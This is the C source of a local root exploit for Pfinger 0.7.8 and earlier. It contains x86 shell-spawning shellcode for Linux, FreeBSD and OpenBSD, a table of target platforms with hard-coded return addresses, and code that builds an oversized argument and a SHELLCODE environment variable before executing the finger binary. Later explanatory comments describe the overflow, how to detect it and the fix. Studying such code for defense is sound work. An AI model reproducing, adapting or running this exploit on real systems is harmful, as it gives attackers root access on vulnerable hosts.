Local root exploit for Pfinger v0.7.8 and earlier. Tested on Red Hat 7.2 - 8.0, Debian 3.0, Slackware 8.0, FreeBSD-4.6 and OpenBSD-3.1.
9fbe81eca5b8a20bbd07cedad950a4ee9e6eee2f91c30870c1a8c42c4f96d821
/*
* !!PRIVATE!! DON'T DISTRIBUTE !!
* L33TSecurity - confidential source
*
* Pfinger-0.7.8 <= Local Exploit
* By Dvdman@L33TSECURITY.COM
* GREETS: UPB,JDUCK
* Thanks for all the C help UPB :)
*
* L33TSecurity - confidential source
* !!PRIVATE!! DON'T DISTRIBUTE !!
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
/* Not referenced anywhere in the visible source; presumably the number of
 * real (non-sentinel) rows in the targets table, which also has 8. */
#define MAX_ARCH 8
/*
 * Payload bytes referenced by every Linux row of the targets table
 * (Red Hat, Debian, Slackware). The author labels it x86 setuid shellcode;
 * the literal contains int $0x80 (cd 80) system-call instructions and ends
 * with the path /bin/sh.
 * Nothing in this file executes the array: main() copies it into the
 * SHELLCODE environment variable that the finger process inherits.
 */
char linuxshellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
"\x5b\xb0\x0b\x88\x53\x07\x52\x53"
"\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
/*
 * Payload bytes referenced by the two FreeBSD rows of the targets table
 * (labelled "FreeBSD Setuid Shellcode" by the author).
 * The immediates 2f 2f 73 68 and 2f 62 69 6e are the ASCII for "//sh" and
 * "/bin"; the sequence ends with int $0x80 (cd 80).
 * Like the other payloads it is only copied into the environment by main().
 */
char freebsdshellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";
/*
 * Payload bytes referenced by the OpenBSD 3.1 row of the targets table.
 * Per the author's inline annotations it pushes the bytes of "//bin/sh"
 * onto the stack, loads 0x3b into %eax and issues int $0x80.
 * Like the other payloads it is only copied into the environment by main().
 */
char openbsdshellcode[]=
"\x99" /* cdq */
"\x52" /* push %edx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp,%ebx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x3b" /* push $0x3b */
"\x58" /* pop %eax */
"\xcd\x80"; /* int $0x80 */
/* One row of per-platform parameters consumed by main() and list_targets(). */
struct TARGET {
char *type;             /* human-readable description printed by list_targets() */
char *shellcode;        /* points at one of the payload arrays defined above */
unsigned long ret_addr; /* absolute address main() writes into the argument buffer */
int pad;                /* number of 'A' filler bytes main() places before the rest */
};
/*
 * Table of supported platforms. The row index is the number the user passes
 * as argv[1]; the final row with type == NULL is the sentinel that ends the
 * loop in list_targets() (its pad field is omitted and therefore zero).
 * ret_addr values are hard-coded absolute addresses, so each row only holds
 * for a process whose memory layout matches the one the author tested;
 * per-run address randomization would presumably invalidate them.
 * The description strings are runtime text and are kept exactly as written.
 */
struct TARGET targets [] = {
{"Redhat 7.2 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
{"Redhat 7.3 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
{"Redhat 8.0 -x86 setuid shellcode", linuxshellcode, 0xbfffff92,124},
{"Debian 3.0 -x86 shellcode", linuxshellcode, 0xbfffff96,88},
{"Slackware 8.0 -x86 shellcode",linuxshellcode, 0xbfffff96,88},
{"Freebsd 4.6-RELEASE -x86 shellcode",freebsdshellcode,0xbfbffe43,88},
{"Freebsd 4.7-RC -x6 shellcode",freebsdshellcode,0xbfbffe43,88},
{"OpenBsd 3.1 -x86 shellcode",openbsdshellcode,0xdfbfdb8e,88},
{NULL, NULL, 0}
};
/* Forward declaration: ussage() is defined after main(). */
void ussage (char *argv);
/*
 * Entry point. Takes one argument, an index into the targets table, builds
 * an oversized command-line argument plus a SHELLCODE environment variable
 * from that row, and replaces the process with ./finger.
 *
 * What the finger binary does with the argument is not visible here; the
 * layout (filler, then an address) suggests it copies argv[1] into a
 * fixed-size stack buffer without a length check -- TODO confirm against the
 * pfinger source. Per the file header the affected versions are 0.7.8 and
 * below, so the fix belongs in pfinger itself (bounded copy / upgrade).
 *
 * For detection: the run shows up as an exec of finger with a single
 * argument of more than a hundred repeated letters and an environment
 * variable named SHELLCODE holding a run of 0x90 bytes.
 *
 * Returns nothing explicitly: if execl() fails, control falls off the end.
 */
int main(int argc, char **argv) {
char buffer[2000];
int x,i,blah;   /* declared but never used */
int target;
int arch;       /* declared but never used */
char *ptr;      /* declared but never used */
long *longptr;  /* declared but never used */
char shell[512];
/* With no argument, print the usage text; ussage() calls exit(0). */
if ((argc < 2))
ussage(argv[0]);
/* NOTE(review): atoi() yields 0 for non-numeric text and the result is used
 * as an array index with no range check, so a negative or too-large value
 * reads outside the targets table (including the NULL sentinel row). */
target = atoi(argv[1]);
/* Build the argument. The buffer is zeroed first because every later write
 * finds the current end of the data with strlen(). */
bzero(&buffer, sizeof(buffer));
memset(buffer,'A',targets[target].pad); /* filler; length comes from the table row */
/* Four more 4-byte groups of filler: BBBB CCCC DDDD EEEE. */
memset(buffer+strlen(buffer),'B',4);
memset(buffer+strlen(buffer),'C',4);
memset(buffer+strlen(buffer),'D',4);
memset(buffer+strlen(buffer),'E',4);
/* The table's absolute address is stored right after the filler. */
*(unsigned long *)(buffer+strlen(buffer))=targets[target].ret_addr; //return address
/* Eight literal bytes plus the terminating NUL (length 9) are appended;
 * the author's note on their purpose: sets ARGC>0x7FFFFFFF. */
memcpy(buffer+strlen(buffer),"\xC4\xC3\xC2\xC1\x45\x53\x80\x80",9); //sets ARGC>0x7FFFFFFF
/* Build the environment entry: 100 bytes of 0x90, the selected payload copied
 * so that it ends at offset 100, then the first 10 bytes overwritten with
 * the variable name. */
memset(shell,0x90,100);
memcpy(&shell[100-strlen(targets[target].shellcode)],targets[target].shellcode,strlen(targets[target].shellcode));
memcpy(shell,"SHELLCODE=",10);
putenv(shell);
/* Relative path: runs whatever file named finger is in the current directory,
 * with the crafted buffer as its only argument. The result is not checked. */
execl("./finger", "finger", buffer, NULL);
}
/*
 * Write every row of the targets table to stderr as "<index>) - <description>".
 * Stops at the sentinel row whose type field is NULL.
 */
void list_targets () {
    int idx = 0;

    while (targets[idx].type != NULL) {
        fprintf (stderr, "%d) - %s\n", idx, targets[idx].type);
        idx++;
    }
}
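/*
 * Print the banner, the usage line and the list of supported targets, then
 * terminate the process.
 *
 * argv: the program name as invoked (main passes argv[0]).
 * Does not return: always calls exit(0).
 */
void ussage (char *argv) {
    printf ("%s - pfinger local root, user, whatever exploit\n", argv);
    printf ("written by dvdman\n\n");
    /* The original supplied no argument for the %s conversion, which is
     * undefined behaviour; pass the program name as the format expects. */
    printf ("Ussage %s <target type> \ntargets avalible:\n\n", argv);
    list_targets ();
    exit(0);
}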